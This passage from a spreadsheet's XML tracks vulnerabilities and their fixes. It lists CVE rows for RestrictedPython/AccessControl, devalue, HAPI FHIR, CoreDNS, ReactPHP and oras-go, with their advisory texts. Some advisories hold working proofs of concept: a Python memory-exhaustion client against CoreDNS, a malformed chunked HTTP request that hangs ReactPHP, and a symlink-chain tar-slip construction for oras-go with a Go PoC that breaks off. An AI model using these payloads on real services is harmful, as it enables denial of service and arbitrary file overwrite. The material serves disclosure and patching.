`string.Formatter` field resolution methods such as `get_field` can perform attribute and item traversal internally and return live object references. This can bypass RestrictedPython's normal attribute guards and may allow access to sensitive objects such as function globals, builtins, file access, or code execution primitives.
Users are impacted if they run untrusted code with RestrictedPython and expose `string.Formatter`, directly or indirectly, for example through a custom import policy or globals.
### Patches
The problem has been patched by blocking access to `string.Formatter` and unsafe `string.Formatter` traversal methods in `safer_getattr`.
Users should upgrade to the patched release once available. Affected and patched version numbers should be filled in when the release is published.
### Workarounds
Do not expose the standard library `string` module or `string.Formatter` to restricted code.
If a custom import hook is used, deny imports of `string` or provide only a restricted wrapper that does not expose `Formatter`. If custom globals are supplied, ensure neither `string.Formatter` nor `Formatter` instances are available to restricted code.</t>
        </is>
      </c>
      <c r="T1090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76825</t>
        </is>
      </c>
    </row>
    <row r="1091">
      <c r="A1091" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1091" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1091" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77401</t>
        </is>
      </c>
      <c r="D1091" s="5" t="inlineStr"/>
      <c r="E1091" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1091" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1091" s="5" t="inlineStr"/>
      <c r="H1091" s="5" t="inlineStr"/>
      <c r="I1091" s="5" t="inlineStr"/>
      <c r="J1091" s="5" t="inlineStr"/>
      <c r="K1091" s="5" t="inlineStr"/>
      <c r="L1091" s="5" t="inlineStr">
        <is>
          <t>pip:AccessControl</t>
        </is>
      </c>
      <c r="M1091" s="5" t="inlineStr">
        <is>
          <t>7.4</t>
        </is>
      </c>
      <c r="N1091" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1091" s="5" t="inlineStr"/>
      <c r="P1091" s="5" t="inlineStr"/>
      <c r="Q1091" s="5" t="inlineStr"/>
      <c r="R1091" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S1091" s="5" t="inlineStr">
        <is>
          <t>### Impact
Python's string `format` functionality allows someone controlling the format string to "read" objects accessible (recursively) via attribute access and subscription from accessible objects. Those attribute accesses and subscriptions use Python's full blown `getattr` and `getitem`, not the policy restricted `AccessControl` variants `_getattr_` and `_getitem_`. This can lead to critical information disclosure.
The `AccessControl` package already guards against direct access to the formatting functions on string instances, but these mitigations did not cover subclasses of `str`.
Affected are all users who allow untrusted users to create AccessControl controlled Python code and execute it.
### Patches
A fix was published with version 7.4.
### Workarounds
There is no workaround.</t>
        </is>
      </c>
      <c r="T1091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77401</t>
        </is>
      </c>
    </row>
    <row r="1092">
      <c r="A1092" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1092" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1092" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81176</t>
        </is>
      </c>
      <c r="D1092" s="5" t="inlineStr"/>
      <c r="E1092" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F1092" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1092" s="5" t="inlineStr"/>
      <c r="H1092" s="5" t="inlineStr"/>
      <c r="I1092" s="5" t="inlineStr"/>
      <c r="J1092" s="5" t="inlineStr"/>
      <c r="K1092" s="5" t="inlineStr"/>
      <c r="L1092" s="5" t="inlineStr">
        <is>
          <t>npm:devalue</t>
        </is>
      </c>
      <c r="M1092" s="5" t="inlineStr">
        <is>
          <t>5.9.2</t>
        </is>
      </c>
      <c r="N1092" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1092" s="5" t="inlineStr"/>
      <c r="P1092" s="5" t="inlineStr"/>
      <c r="Q1092" s="5" t="inlineStr"/>
      <c r="R1092" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S1092" s="5" t="inlineStr">
        <is>
          <t>### Impact
`devalue.parse` prior to version 5.9.2 fails to reject out-of-bounds indices. Specially-crafted payloads can exploit this to cause devalue to alternate between different array representations, resulting in work that is quadratic with payload size.
Applications are potentially affected if they call `devalue.parse` with untrusted data.
### Patches
The bug is fixed in `devalue@5.9.2`.</t>
        </is>
      </c>
      <c r="T1092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81176</t>
        </is>
      </c>
    </row>
    <row r="1093">
      <c r="A1093" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1093" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1093" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81875</t>
        </is>
      </c>
      <c r="D1093" s="5" t="inlineStr"/>
      <c r="E1093" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1093" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1093" s="5" t="inlineStr"/>
      <c r="H1093" s="5" t="inlineStr"/>
      <c r="I1093" s="5" t="inlineStr"/>
      <c r="J1093" s="5" t="inlineStr"/>
      <c r="K1093" s="5" t="inlineStr"/>
      <c r="L1093" s="5" t="inlineStr">
        <is>
          <t>maven:ca.uhn.hapi.fhir:org.hl7.fhir.r5, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation.cli</t>
        </is>
      </c>
      <c r="M1093" s="5" t="inlineStr">
        <is>
          <t>6.9.12</t>
        </is>
      </c>
      <c r="N1093" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1093" s="5" t="inlineStr"/>
      <c r="P1093" s="5" t="inlineStr"/>
      <c r="Q1093" s="5" t="inlineStr"/>
      <c r="R1093" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-409</t>
        </is>
      </c>
      <c r="S1093" s="5" t="inlineStr">
        <is>
          <t>### Summary
`SHCParser` inflates compressed Smart Health Card JWT payloads into memory without a decompressed-size limit. An attacker who can submit SHC content for validation can craft a small compressed JWT payload that expands to a very large byte array, causing memory exhaustion or severe garbage collection pressure.
### Details
The vulnerable code is in `org.hl7.fhir.r5/src/main/java/org/hl7/fhir/r5/elementmodel/SHCParser.java`.
`decodeJWT()` checks `MAX_ALLOWED_SHC_LENGTH`, but this only logs an error and parsing continues:
```java
// SHCParser.java:282-284
if (jwt.length() &gt; MAX_ALLOWED_SHC_LENGTH) {
  logError(...);
}
```
If the header contains `"zip":"DEF"`, the payload is inflated before JSON parsing:
```java
// SHCParser.java:300-304
if ("DEF".equals(res.header.asString("zip"))) {
  payloadJson = inflate(payloadJson);
}
res.payload = JsonParser.parseObject(FileUtilities.bytesToString(payloadJson), true);
```
`inflate()` accumulates all decompressed output in a `ByteArrayOutputStream` and has no maximum output size:
```java
// SHCParser.java:455-468
while (!inflater.finished()) {
  final int count = inflater.inflate(buffer);
  outputStream.write(buffer, 0, count);
}
return outputStream.toByteArray();
```
The same unbounded decompression pattern exists in `decompress()` at `SHCParser.java:410-423`.
### PoC
Create a highly compressible SHC-shaped JSON payload, compress it with raw DEFLATE (`new Deflater(9, true)`), Base64URL-encode it as the JWT payload, and set the JWT header to `{"zip":"DEF"}`.
Local verification measured the following expansion through `SHCParser.inflate()`:
```text
plain=1000066 compressed=1052 inflated=1000066 ratio=950
plain=16000066 compressed=15626 inflated=16000066 ratio=1023
```
A small compressed payload can therefore allocate many megabytes of heap. Larger payloads can trigger `OutOfMemoryError` or process instability.
### Impact
This is a denial-of-service vulnerability. Any validator service or application that accepts attacker-supplied SHC content can be forced to allocate excessive heap memory. Impact ranges from request failure and severe GC pressure to process termination.
### Credits
- Thai Son Dinh from VinSOC Labs (R&amp;D)</t>
        </is>
      </c>
      <c r="T1093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81875</t>
        </is>
      </c>
    </row>
    <row r="1094">
      <c r="A1094" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1094" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1094" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81876</t>
        </is>
      </c>
      <c r="D1094" s="5" t="inlineStr"/>
      <c r="E1094" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1094" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1094" s="5" t="inlineStr"/>
      <c r="H1094" s="5" t="inlineStr"/>
      <c r="I1094" s="5" t="inlineStr"/>
      <c r="J1094" s="5" t="inlineStr"/>
      <c r="K1094" s="5" t="inlineStr"/>
      <c r="L1094" s="5" t="inlineStr">
        <is>
          <t>maven:ca.uhn.hapi.fhir:org.hl7.fhir.r5, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation.cli</t>
        </is>
      </c>
      <c r="M1094" s="5" t="inlineStr">
        <is>
          <t>6.9.12</t>
        </is>
      </c>
      <c r="N1094" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1094" s="5" t="inlineStr"/>
      <c r="P1094" s="5" t="inlineStr"/>
      <c r="Q1094" s="5" t="inlineStr"/>
      <c r="R1094" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="S1094" s="5" t="inlineStr">
        <is>
          <t>### Summary
A malformed Smart Health Card (SHC) JWT with `zip: "DEF"` and an empty or truncated DEFLATE payload causes `SHCParser.inflate()` to loop forever. This allows an attacker who can submit SHC content for validation to pin a JVM worker thread indefinitely, causing denial of service.
### Details
The vulnerable code is in `org.hl7.fhir.r5/src/main/java/org/hl7/fhir/r5/elementmodel/SHCParser.java`.
`decodeJWT()` inflates the JWT payload when the header contains `"zip":"DEF"`:
```java
// SHCParser.java:300-302
if ("DEF".equals(res.header.asString("zip"))) {
  payloadJson = inflate(payloadJson);
}
```
`inflate()` loops only on `!inflater.finished()` and does not check `inflater.needsInput()`, `inflater.needsDictionary()`, or zero-progress output:
```java
// SHCParser.java:455-468
while (!inflater.finished()) {
  final int count = inflater.inflate(buffer);
  outputStream.write(buffer, 0, count);
}
```
For empty or truncated raw DEFLATE input, `Inflater.inflate()` returns `0`, `finished()` remains `false`, and `needsInput()` becomes `true`, producing an infinite tight loop. The same unsafe loop pattern also exists in `decompress()` at `SHCParser.java:410-423`.
The validator reaches this path during SHC validation and during file-format detection for SHC-looking input (`ResourceChecker.java:115-118`).
### PoC
Compile the project, then run a minimal local harness that calls:
```java
SHCParser.inflate(new byte[0]);
```
This never returns. Local verification:
```bash
timeout 3s java -cp ... VerifyDoSFindings shcHang
echo $?
# 124 = timeout killed the hung process
```
A JWT PoC uses:
- header: Base64URL(`{"zip":"DEF"}`)
- payload: empty or truncated raw DEFLATE bytes
- signature: arbitrary
Submit the resulting token as SHC content, for example via a `.shc` file or content beginning with `shc:/` that reaches the validator's SHC detection path.
### Impact
This is a denial-of-service vulnerability. A single malformed SHC validation request can consume a worker thread indefinitely. In services that validate uploaded SHC content, a small number of concurrent malformed requests can exhaust all validation workers.
### Credits
- Thai Son Dinh from VinSOC Labs (R&amp;D)</t>
        </is>
      </c>
      <c r="T1094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81876</t>
        </is>
      </c>
    </row>
    <row r="1095">
      <c r="A1095" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1095" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82399</t>
        </is>
      </c>
      <c r="D1095" s="5" t="inlineStr"/>
      <c r="E1095" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1095" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1095" s="5" t="inlineStr"/>
      <c r="H1095" s="5" t="inlineStr"/>
      <c r="I1095" s="5" t="inlineStr"/>
      <c r="J1095" s="5" t="inlineStr"/>
      <c r="K1095" s="5" t="inlineStr"/>
      <c r="L1095" s="5" t="inlineStr">
        <is>
          <t>go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M1095" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N1095" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1095" s="5" t="inlineStr"/>
      <c r="P1095" s="5" t="inlineStr"/>
      <c r="Q1095" s="5" t="inlineStr"/>
      <c r="R1095" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S1095" s="5" t="inlineStr">
        <is>
          <t>### Summary
CoreDNS parses attacker-controlled DNS section counts before validating them on DNS-over-HTTPS (DoH and DoH3), DNS-over-QUIC (DoQ), and DNS-over-gRPC listeners. An unauthenticated client can use DNS name compression to make one
65,533-byte request allocate more than 10 MiB while it is unpacked. Concurrent requests can exhaust memory and terminate CoreDNS.
### Details
The affected request paths call `dns.Msg.Unpack` directly:
- [DoH POST and GET decoding](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/doh/doh.go#L134-L155). DoH3 uses the same decoder.
- [DoQ stream handling](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_quic.go#L212-L219).
- [DNS-over-gRPC query handling](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_grpc.go#L176-L184).
This differs from the [miekg/dns](https://github.com/miekg/dns) UDP and TCP server. Its [`serveDNS`](https://github.com/miekg/dns/blob/v1.1.72/server.go#L628-L643) path decodes the fixed 12-byte header and invokes [`DefaultMsgAcceptFunc`](https://github.com/miekg/dns/blob/v1.1.72/acceptfunc.go#L33-L57) before unpacking the DNS sections. The default policy rejects requests unless `QDCOUNT` is exactly one and also limits the other section counts. CoreDNS's custom transports bypass this early validation.
Parsing happens before the plugin chain. Plugin-level rate limiting or request handling cannot prevent the allocation. The fix is to apply `dns.DefaultMsgAcceptFunc` to the fixed header before calling `Msg.Unpack` in each custom request transport. Response decoding must remain separate because the request policy intentionally rejects response headers.
### PoC
The PoC runs against the DoH server.
Run the following from a clean checkout of CoreDNS v1.14.6. Docker must support container memory limits. The example uses the test certificate already present in the repository and publishes the test service only on loopback.
Save this as `Corefile.cd01`:
```text
https://.:8053 {
    tls /cert.pem /key.pem
    whoami
}
```
Save this standard-library client as `poc-cd01.py`:
```python
#!/usr/bin/env python3
import argparse
import concurrent.futures
from collections import Counter
import http.client
import ssl
import struct
def normal_query():
    header = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
    question = b"\x07example\x03org\x00" + struct.pack("!HH", 1, 1)
    return header + question, 1
def attack_query():
    message = bytearray(65535)
    offset = 12
    name_offset = offset
    for size in (63, 63, 63, 61):
        message[offset] = size
        offset += 1
        message[offset : offset + size] = b"\x01" * size
        offset += size
    message[offset] = 0
    offset += 1
    struct.pack_into("!HH", message, offset, 1, 1)
    offset += 4
    questions = 1
    while offset + 6 &lt;= len(message):
        struct.pack_into("!HHH", message, offset, 0xC000 | name_offset, 1, 1)
        offset += 6
        questions += 1
    struct.pack_into(
        "!HHHHHH", message, 0, 0x1234, 0x0100, questions, 0, 0, 0
    )
    return bytes(message[:offset]), questions
def send(payload):
    context = ssl._create_unverified_context()
    connection = http.client.HTTPSConnection(
        "127.0.0.1", 18053, timeout=3, context=context
    )
    try:
        connection.request(
            "POST",
            "/dns-query",
            body=payload,
            headers={"Content-Type": "application/dns-message"},
        )
        response = connection.getresponse()
        response.read()
        return f"http-{response.status}"
    except Exception:
        return "error"
    finally:
        connection.close()
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("--normal", action="store_true")
    parser.add_argument("--workers", type=int, default=1)
    args = parser.parse_args()
    payload, questions = normal_query() if args.normal else attack_query()
    print(
        f"payload={len(payload)} questions={questions} workers={args.workers}"
    )
    with concurrent.futures.ThreadPoolExecutor(args.workers) as pool:
        results = pool.map(send, [payload] * args.workers)
    print(Counter(results))
if __name__ == "__main__":
    main()
```
Build the Linux binary and container image:
```sh
GOCACHE=/tmp/coredns-gocache \
GOOS=linux GOARCH="$(go env GOARCH)" CGO_ENABLED=0 \
go build -tags=grpcnotrace -o coredns .
docker build --tag coredns-cd01:vulnerable .
```
Start CoreDNS with a 64 MiB memory and swap limit:
```sh
docker run --detach --name coredns-cd01 \
  --memory 64m --memory-swap 64m \
  --publish 127.0.0.1:18053:8053/tcp \
  --volume "$PWD/Corefile.cd01:/Corefile:ro" \
  --volume "$PWD/plugin/tls/test_cert.pem:/cert.pem:ro" \
  --volume "$PWD/plugin/tls/test_key.pem:/key.pem:ro" \
  coredns-cd01:vulnerable -conf /Corefile
```
Confirm that the listener works and that one malicious request is accepted:
```console
$ python3 poc-cd01.py --normal
payload=29 questions=1 workers=1
Counter({'http-200': 1})
$ python3 poc-cd01.py
payload=65533 questions=10878 workers=1
Counter({'http-200': 1})
```
Send 32 malicious requests concurrently and inspect the container:
```console
$ python3 poc-cd01.py --workers 32
payload=65533 questions=10878 workers=32
Counter({'error': 32})
$ docker inspect --format '{{.State.Status}} OOMKilled={{.State.OOMKilled}} ExitCode={{.State.ExitCode}}' coredns-cd01
exited OOMKilled=true ExitCode=137
```
`OOMKilled=true` confirms that the container was terminated by memory exhaustion rather than a CoreDNS configuration error.
### Impact
This is an unauthenticated denial-of-service vulnerability. Deployments are affected when DoH, DoH3, DoQ, or DNS-over-gRPC is exposed to an attacker. The ordinary miekg/dns UDP and TCP listeners are not affected because they perform the header acceptance check before unpacking.
In the validated configuration, 32 requests OOM-killed a CoreDNS container limited to 64 MiB. Higher memory limits increase the number of concurrent requests required but do not remove the allocation amplification. Successful exploitation interrupts DNS service.
CoreDNS versions v007 through v1.14.6 are affected when DNS-over-gRPC is exposed. DoH is affected from v1.1.3, DoQ from v1.11.0, and DoH3 from v1.13.2.</t>
        </is>
      </c>
      <c r="T1095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82399</t>
        </is>
      </c>
    </row>
    <row r="1096">
      <c r="A1096" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1096" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84997</t>
        </is>
      </c>
      <c r="D1096" s="5" t="inlineStr"/>
      <c r="E1096" s="5" t="inlineStr"/>
      <c r="F1096" s="5" t="inlineStr"/>
      <c r="G1096" s="5" t="inlineStr"/>
      <c r="H1096" s="5" t="inlineStr"/>
      <c r="I1096" s="5" t="inlineStr"/>
      <c r="J1096" s="5" t="inlineStr"/>
      <c r="K1096" s="5" t="inlineStr"/>
      <c r="L1096" s="5" t="inlineStr">
        <is>
          <t>composer:react/http</t>
        </is>
      </c>
      <c r="M1096" s="5" t="inlineStr">
        <is>
          <t>1.11.1</t>
        </is>
      </c>
      <c r="N1096" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1096" s="5" t="inlineStr"/>
      <c r="P1096" s="5" t="inlineStr"/>
      <c r="Q1096" s="5" t="inlineStr"/>
      <c r="R1096" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="S1096" s="5" t="inlineStr">
        <is>
          <t>### Summary
A malformed HTTP message using `Transfer-Encoding: chunked` can drive `React\Http\Io\ChunkedDecoder` into an infinite loop, pegging a CPU core and freezing the event loop. Because ReactPHP is single-threaded, one such message stalls the entire process for every client until it is killed.
Both directions are affected. `ChunkedDecoder` decodes chunked **request** bodies for `React\Http\HttpServer` and chunked **response** bodies for `React\Http\Browser`, so a server can be attacked by a malicious client and a client can be attacked by a malicious or compromised server.
### Details
`ChunkedDecoder::handleData()` loops `while ($this-&gt;buffer !== '')` and relies on the buffer shrinking each iteration. Two states leave the buffer unchanged while the loop condition stays true.
**Terminal-chunk trailer.** After the terminating `0` chunk, any remaining buffer is treated as trailer data to skip:
```php
} elseif ($this-&gt;chunkSize === 0) {
    $this-&gt;buffer = (string)\substr($this-&gt;buffer, $positionCrlf);
}
```
When the trailer holds no CRLF yet, `strpos()` returns `false`, PHP coerces that to `0` in `substr()`, and the buffer is never advanced. Neither the error guard (which requires a non-zero chunk size) nor the wait guard (which requires fewer than two bytes remaining) can fire, so the loop re-enters with identical state.
**Off-by-one after a completed chunk.** Once a non-terminal chunk has been fully transferred, the "chunk does not end with a CRLF" error guard requires `strlen($this-&gt;buffer) &gt; 2` while the wait guard requires `&lt; 2`. Exactly two non-CRLF bytes slip past both, and because the chunk is already complete nothing is consumed on the next iteration.
### PoC
Run the example server from the `reactphp/reactphp` README and send a malformed request. Note the missing trailing `\r\n`:
```
POST / HTTP/1.1\r\nHost: x\r\nTransfer-Encoding: chunked\r\n\r\n0\r\nab
```
The PHP process pegs at 100% CPU and stops answering legitimate requests. A body of `1\r\nAAB` triggers the second state.
The client side is reachable the same way: a `Browser` request to a server that answers with `Transfer-Encoding: chunked` and either malformed body shape hangs the client process.
### Impact
Denial of service. The affected process stops responding entirely and has to be killed.
Servers behind a reverse proxy that parses and re-frames HTTP, such as a typical nginx setup, are not affected on the **server** side, because the proxy normalises the request before it reaches PHP. That mitigation does not extend to the **client** side: outbound requests made with `Browser` reach the remote server directly, so an application fetching attacker-influenced URLs is affected regardless of what sits in front of it.</t>
        </is>
      </c>
      <c r="T1096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84997</t>
        </is>
      </c>
    </row>
    <row r="1097">
      <c r="A1097" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1097" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85731</t>
        </is>
      </c>
      <c r="D1097" s="5" t="inlineStr"/>
      <c r="E1097" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1097" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1097" s="5" t="inlineStr"/>
      <c r="H1097" s="5" t="inlineStr"/>
      <c r="I1097" s="5" t="inlineStr"/>
      <c r="J1097" s="5" t="inlineStr"/>
      <c r="K1097" s="5" t="inlineStr"/>
      <c r="L1097" s="5" t="inlineStr">
        <is>
          <t>go:oras.land/oras-go/v2</t>
        </is>
      </c>
      <c r="M1097" s="5" t="inlineStr">
        <is>
          <t>2.6.2</t>
        </is>
      </c>
      <c r="N1097" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1097" s="5" t="inlineStr"/>
      <c r="P1097" s="5" t="inlineStr"/>
      <c r="Q1097" s="5" t="inlineStr"/>
      <c r="R1097" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S1097" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `content/file.Store` in oras-go v2 unpacks OCI layer tarballs when a descriptor carries `io.deis.oras.content.unpack=true`. The extraction routine validates symlink targets purely lexically (`filepath.Join`) and, for regular files placed directly at the extraction root, skips the parent-symlink `Lstat` walk. A malicious tarball can plant a chain of symlinks whose lexical target stays inside the extraction root but whose kernel-resolved target is any absolute path, then write through it with a follow-up regular-file entry. The result is arbitrary file create/overwrite outside the store's working directory under the default `AllowPathTraversalOnWrite=false` configuration — a canonical tar-slip → RCE primitive.
### Details
**Affected versions:** `&lt;= v2.6.1`
**Entry point:** `content/file/file.go` line 486, `(*Store).pushDir` — reached from `(*Store).Push` for any descriptor whose annotations include `io.deis.oras.content.unpack: "true"` (i.e. `file.AnnotationUnpack`) and an `org.opencontainers.image.title`. `oras.Copy` from a remote registry into a `file.New(dir)` store invokes this per layer.
**Root cause 1 — lexical link validation.** `content/file/utils.go` lines 264–275, `ensureLinkPath`:
```go
func ensureLinkPath(baseAbs, baseRel, link, target string) (string, error) {
        // resolve link
        path := target
        if !filepath.IsAbs(target) {
                path = filepath.Join(filepath.Dir(link), target)
        }
        // ensure path is under baseAbs or baseRel
        if _, err := resolveRelToBase(baseAbs, baseRel, path); err != nil {
                return "", err
        }
        return target, nil
}
```
`filepath.Join` cleans `..` components textually and does **not** dereference symlinks in intermediate components. It therefore cannot detect that a component of `target` is itself a previously-extracted symlink that the kernel will follow before applying subsequent `..` components.
**Root cause 2 — parent-symlink check skipped for root-level entries.** `content/file/utils.go` lines 247–257, inside `resolveRelToBase`:
```go
// No symbolic link allowed in the relative path
dir := filepath.Dir(path)
for dir != "." {
        if info, err := os.Lstat(filepath.Join(baseAbs, dir)); err != nil {
                ...
        } else if info.Mode()&amp;os.ModeSymlink != 0 {
                return "", fmt.Errorf("no symbolic link allowed between %q and %q", baseRel, target)
        }
        dir = filepath.Dir(dir)
}
```
For an entry named `&lt;title&gt;/escape`, `path == "escape"` and `filepath.Dir("escape") == "."`, so the loop body never executes — the entry itself is never `Lstat`-checked.
**Root cause 3 — write follows symlinks.** `content/file/utils.go` line 279, `writeFile`:
```go
file, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, perm)
```
No `O_NOFOLLOW`, so if `path` is a symlink the write goes to its target.
**Data flow / exploit construction.** Let `baseAbs = &lt;workingDir&gt;/&lt;title&gt;` and `N = depth(baseAbs)` (number of path components from `/`). The attacker's tar.gz contains, in order:
1. `N` nested directories `&lt;title&gt;/d0/d1/…/d{N-1}`.
2. A symlink `&lt;title&gt;/d0/…/d{N-1}/up` → `"../../…"` (`N` levels). Both lexically and on disk this resolves to `baseAbs`, so `ensureLinkPath` accepts it and `resolveRelToBase` sees only real directories in its ancestry.
3. A symlink `&lt;title&gt;/escape` → `"d0/…/d{N-1}/up/../../…/&lt;absTarget&gt;"` (`N` `..` components after `up`). **Lexically**, `filepath.Join(baseAbs, "d0/…/up/../…/&lt;absTarget&gt;")` cancels the `N` `..` against `up` plus `d{N-2}…d0`, yielding `baseAbs/d0/&lt;absTarget&gt;` — inside the root, so `ensureLinkPath` accepts it. `resolveRelToBase` then walks `d0/&lt;absTarget-parents&gt;`, none of which are symlinks (they don't exist), so the link is created. **At the kernel**, resolving `baseAbs/d0/…/up` first follows `up` back to `baseAbs`, and the remaining `N` `..` components climb from `baseAbs` to `/`, then `&lt;absTarget&gt;` is appended — the symlink points at the attacker-chosen absolute path.
4. A regular file `&lt;title&gt;/escape` (same name). `resolveRelToBase("escape")` yields `dir == "."` (root cause 2), so no `Lstat` is performed. `extractTarDirectory` (line 181) calls `writeFile` which opens `baseAbs/escape` with `O_TRUNC` and no `O_NOFOLLOW` (root cause 3), writing the attacker's payload through the symlink to `&lt;absTarget&gt;`.
**Why v2.6.1's `checkSymlinkEscape` does not help.** The fix for GHSA-8xwf-rjm4-xvhv added a symlink-resolving containment check, but it is called only from `resolveWritePath` (`content/file/file.go` line 632) on the **`pushFile`** path. `pushDir` → `extractTarGzip` → `extractTarDirectory` never calls it; `content/file/utils.go` is byte-identical between v2.6.0 and v2.6.1.
**Suggested remediation.** Any of: (a) `Lstat` the final path component before opening for write and reject symlinks; (b) open with `O_NOFOLLOW` (or `O_EXCL` for new files); (c) resolve link targets with `filepath.EvalSymlinks` on the deepest existing ancestor (as `checkSymlinkEscape` already does) instead of lexical `filepath.Join`; (d) extract into a fresh empty directory and use `openat2(RESOLVE_BENEATH)` / `os.Root` (Go 1.24+) for all filesystem operations.
### PoC
```
go mod init poc
go get oras.land/oras-go/v2@v2.6.1
go run .
```
```go
// Arbitrary file write outside a default-configured file.Store via
// symlink-chain bypass in content/file.extractTarDirectory.
//
// ensureLinkPath() validates symlink targets purely lexically with
// filepath.Join, which collapses ".." textually and does not follow
// intermediate symlink components. By first planting a deep "up" symlink
// that legitimately resolves to the extraction root, an "escape" symlink
// can be crafted whose lexical target stays in-bounds but whose
// kernel-resolved target is any absolute path. A follow-up TypeReg entry
// with the same name is opened with O_CREATE|O_TRUNC (no O_NOFOLLOW),
// writing through the symlink.
//
// Realistic trigger: oras.Copy() from an untrusted registry into a
// file.New() store. The attacker controls the manifest (sets
// AnnotationTitle + AnnotationUnpack=true on a layer) and the layer blob.
// All digests are honest, so content verification passes.
package main
import (
        "archive/tar"
        "bytes"
        "compress/gzip"
        "context"
        _ "crypto/sha256"
        "fmt"
        "os"
        "path/filepath"
        "strings"
        "github.com/opencontainers/go-digest"
        ocispec "github.com/opencontainers/image-spec/specs-go/v1"
        "oras.land/oras-go/v2/content/file"
)
func main() {
